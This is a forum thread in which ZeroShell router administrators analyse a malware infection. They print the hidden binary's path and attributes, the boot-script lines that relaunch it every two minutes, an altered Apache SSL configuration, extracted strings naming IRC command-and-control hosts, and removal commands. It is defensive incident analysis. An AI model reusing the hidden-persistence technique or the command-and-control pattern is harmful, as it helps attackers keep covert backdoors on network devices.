› Forums › Network Management › ZeroShell › DoS on DNS Zeroshell: Malware!
- This topic is empty.
-
AuthorPosts
-
November 6, 2013 at 3:50 pm #43775
fsala
MemberHi all,
I found a malware on one of our ZS board, that create DoS on Zeroshell DNS with 20k connections on it.Full analysis on the italian board (sorry, Italian only, I’ll translate it in a while…): http://www.zeroshell.net/forum/viewtopic.php?t=4115
November 6, 2013 at 3:59 pm #52997fsala
MemberIn short:
Issue is in a running hidden executable (/DB/.DB.001) that opens thousands of connections to the DNS :!:.
File attributes are made to hide it and make deletion harder.
root@zeroshell DB> ls -al
total 131252
drwxr-xr-x 4 root root 4096 Oct 21 17:09 .
drwxr-xr-x 21 root root 520 Nov 6 12:55 ..
-rwxr-xr-x 1 root root 23289 Nov 21 2012 .DB.001
drwxr-xr-x 7 root root 4096 Jul 2 2012 _DB.001
drwx
2 root root 16384 Apr 20 2011 lost+found
-rw-r--r-- 1 root root 134217728 Apr 20 2011 swap-file
root@zeroshell DB> lsattr .DB.001
-u--ia
.DB.001
To deactivate/rename it:
killall -9 .DB.001 ; chattr -iua .DB.001 ; mv .DB.001 DB-malware
I analyzed the activity with “strace”: there are thousands of connections to DNS with query for “zeroshell.will.mx” and “zeroshell.samhan.biz” and the binary contains code to activate IRC connection (like a lot of worms).
Executable starts at boot, inside “Database Update” script (you find it in the Startup/Cron area) and is scheduled to restart every 2 minutes.
# SSL Security Check
Security=$(cat /etc/httpd/ssl.conf | grep C100-Security-Fix-beta12)
if [ -z "$Security" ] && [ -f "/Database/var/register/system/ssl/ssl.conf" ]; then
cp -rf /Database/var/register/system/ssl/ssl.conf /etc/httpd/ssl.conf
httpd=$(pidof httpd);kill -HUP $httpd
fi
# Database Update
Database=$(pidof .DB.001)
if [ -z "$Database" ]; then
/DB/.DB.001
fi
echo "OK"
It changes also SSL configuration of Apache:
# C100-Security-Fix-beta12
SSLOptions +StdEnvVars
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(..//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
RewriteRule .* - [F]
The binary payload contains this kind of strings (IRC connection, browser emulation…), so I’m sure it’s a malware:
zeroshell.will.mx
zeroshell.samhan.biz
r/usr/dict/words%s : USERID : UNIX : %s
http://GET /%s HTTP/1.0
User-Agent: Mozilla/4.75 (X11; U; Linux 2.2.16-3 i686)
NICK %s
HELPIRC SH export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%sNOTICE %s :%s
MODE %s -xi
JOIN %s :%s
WHO %s
PONG %s
352376433422PRIVMSGPINGNICKmkdir /tmp/lol/lib/kw+#z1zNICK %s
USER %s localhost localhost
At the moment, I don’t know what was the infection entry point, but I suspect a bug in the openSSL library or in that area…
Hope it helps!
Fabrizio Sala/Netdream
December 5, 2013 at 1:34 pm #52998bbozo
MemberZS 1 b16
ZS 2 rc2
almost all my routers (4 of 5) where infectedIs there going to be some kind of patch?
fsala thank you!!!!
January 9, 2014 at 8:13 pm #52999jpJxPhOuhvqc
ParticipantI’ve found one of my installations infected with this too.
Can we try and narrow down what we have in common to work out the infection method.
I am running Release 2.0.RC2 setup and running since circa. 17/02/2013
I have (open to the world):
-Port 80 (the web interface)
-Port 443 (the web interface)
-Some LAN-to-LAN (OpenVPN) connections.-rwxr-xr-x 1 root root 23289 Nov 21 2012 .DB.001
Yet other installations have not been infected.
OK Installation 1 = Release 2.0.RC2 / Port 80 (Zeroshell server) only open to the world (Port 443 is blocked) running for about a year.OK Installation 2 = Release 2.0.RC2 / No ports open to the world running for about 2 months
OK Installation 3 = Release 2.0.RC1 / Port 80, 443 and SSH open to the world running for about a year
Both the hosts referenced in the copy I have are the same as the OP.
zeroshell.will.mx
and
zeroshell.samhan.biz
Luckily both of these don’t resolve and given the date on the infection I presume this must be a very, very old infection that we’ve only just discovered.root@zeroshell DB> pstree -Gp
init(1)─┬─.DB.001(14049)
root@zeroshell DB> ps aux | grep 14049
root 7832 0.0 0.0 1944 244 pts/0 S 03:33 0:00 grep 14049
root 14049 0.0 0.2 2036 640 ? S 2013 64:09 sleep 1800I slayed and reloaded the process and it spawned two of itself and instantly tries to resolve zeroshell.will.mx and zeroshell.samhan.biz.
I forced my network to respond with an IP and the infection then tries to contact zeroshell.will.mx on port 53 using TCP using the IRC protocol:NICK WORO
USER DCRK localhost localhost :VQYJWOTom – http://www.mouselike.org
-
AuthorPosts
- You must be logged in to reply to this topic.